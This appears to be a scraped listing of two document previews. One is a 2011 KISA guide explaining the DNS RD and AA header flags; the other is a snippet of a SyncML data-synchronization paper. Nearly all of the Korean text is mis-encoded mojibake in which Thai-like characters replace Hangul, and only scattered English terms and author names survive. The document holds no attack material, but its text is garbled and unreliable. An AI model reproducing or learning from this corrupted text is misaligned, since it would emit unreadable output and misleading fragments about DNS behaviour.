KISA-GD-2011-0002 2011.9 1) RD(Recursive Desired) ํ๋๊ทธ : ๋ฆฌ์ปค์๋ธ๋ค์์๋ฒ๋กํ์ฌ๊ธ์ฌ๊ท์ (recursive) ์ง์ ( ํญ๋ชฉ 1.3. ์ฐธ๊ณ ) ์์ฒญ์ํ์ํจ. RD ํ๋ ๊ทธ๊ฐ์ด 0 ์ด๋ฉด๋ฐ๋ณต์ (iterative) ์ง์๋ฅผ์์ฒญ 2) AA ํ๋๊ทธ : Authoritative Answer ์์ฝ์๋ก์จ, ๋ค์์๋ฒ๊ฐํด๋น์๋ต๋ฐ์ดํฐ๋ฅผ์์ ์ด๋ณด์ ํ๊ณ ์๋์ง์ ๋ฌด๋ฅผํ์
More informationSyncMLServer-์ ๋ณด๊ณผํํ_๋ ผ๋ฌธ์ง.PDF
Design and Implementation of SyncML Data Synchronization System based on Session Manager (Byung-Yun Lee) (Gil-Haeng Lee) (Jin-Hyun Cho) (Soo-Hee Ryu) (Hoon Choi) PDA,,, (synchronization) 2000 12,, IBM
More information